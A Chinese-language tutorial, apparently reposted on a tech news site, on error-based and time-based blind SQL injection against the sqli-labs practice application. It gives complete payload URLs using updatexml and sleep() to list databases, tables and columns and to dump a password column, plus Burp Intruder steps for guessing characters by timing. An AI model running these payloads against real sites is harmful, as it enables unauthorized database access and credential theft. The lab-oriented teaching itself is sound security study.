千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 互联网科技 >

sql注入漏洞报错注入和盲注是怎么样的

发表于:2025-01-24 作者:千家信息网编辑
千家信息网最后更新 2025年01月24日,今天就跟大家聊聊有关 sql注入漏洞报错注入和盲注是怎么样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。环境:sqli的第一关用的szx.p
千家信息网最后更新 2025年01月24日sql注入漏洞报错注入和盲注是怎么样的

今天就跟大家聊聊有关 sql注入漏洞报错注入和盲注是怎么样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

环境:sqli的第一关用的szx.php

一、报错注入

1、获取数据库名称,通过修改limit 后面的值获取不同的数据库名称

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 2,1),1) -- +

2、获取数据库中的表,指定数据库名称,通过修改limit 后面的值获取不同的表名

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 2,1),1) -- +

3、获取表字段,指定表名并转为十六进制形式,通过修改limit 后面的值获取不同的表字段

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、获取字段内容,指定数据库字段和表名称,通过修改limit 后面的值获取不同的字段内容

http://192.168.1.129/sqli/Less-1/?id=1'  and updatexml(1,(select concat(0x7e, pass,0x7e) from jay.user limit 1,1),1) -- +

二、盲注

1、获取数据库长度,如果数据长度大于等于2等待5秒,如果小于2不做任何操作,修改该数值判断数据库长度

http://192.168.1.129/php/szx.php?id=1 and (select (if(length(database())>2,sleep(5),null)))#

2、获取数据库名称

如果数据名称左边第一个是'j',多停留1面,如果不是多停留5秒,修改该字符判断数据库名称

http://192.168.1.129/php/szx.php?id=1 and If(left(database(),1)='j',1,sleep(5))

如果数据名称左边第一个是106,ascii码是'j',多停留1面,如果不是多停留5秒,修改该字符判断数据库名称

http://192.168.1.129/php/szx.php?id=1 and If(ascii(substr(database(),1,1))=106,sleep(1),sleep(5))

三、Burpsuit探测(盲注)

1、抓包发送到Intruder模块,并设置好变量

2、设置payload,ASCII中a-z是97-122,设置步长为1

3、start attack,只有106的时间是2000,其他时间都是5000多,说明第一个位数字的ASCII码是106,依次类推获取其他位置的信息

看完上述内容,你们对 sql注入漏洞报错注入和盲注是怎么样的有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。

很赞哦!
数据 数据库 名称 内容 字段 不同 长度 漏洞 字符 时间 位置 信息 十六进制 变量 只有 形式 数值 数字 更多 模块 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 网络安全基本知识漫画 阜阳计算机网络技术 外企德科软件开发 连云港app软件开发价钱 湖北电信服务器ip 虚拟主机 朔州网络技术市场报价 软件开发助力岗培生 多益网络技术类笔试 软件开发学啥好找工作 共享服务器响应失败怎么解决 威海爱川网络技术有限公司 考克兰数据库如何注册 万网数据库导出 本地数据库实时同步到远程服务器 南京移动软件开发 网络安全专业学习困难吗 军人如何应对网络安全问题 wps公司软件开发 csgo对服务器命令过多 梦之星服务器 b站数据库不安全吗 酒店住宿管理系统数据库代码 扬州海航软件开发诚信服务 oracle连指数据库实例 北京电力时钟同步服务器 数据库的系统模型分别为 卸载旧的MYSQL数据库服务 java访问数据库的架包 mvc4和数据库交互 数据库技术及应用思政定位

相关文章

0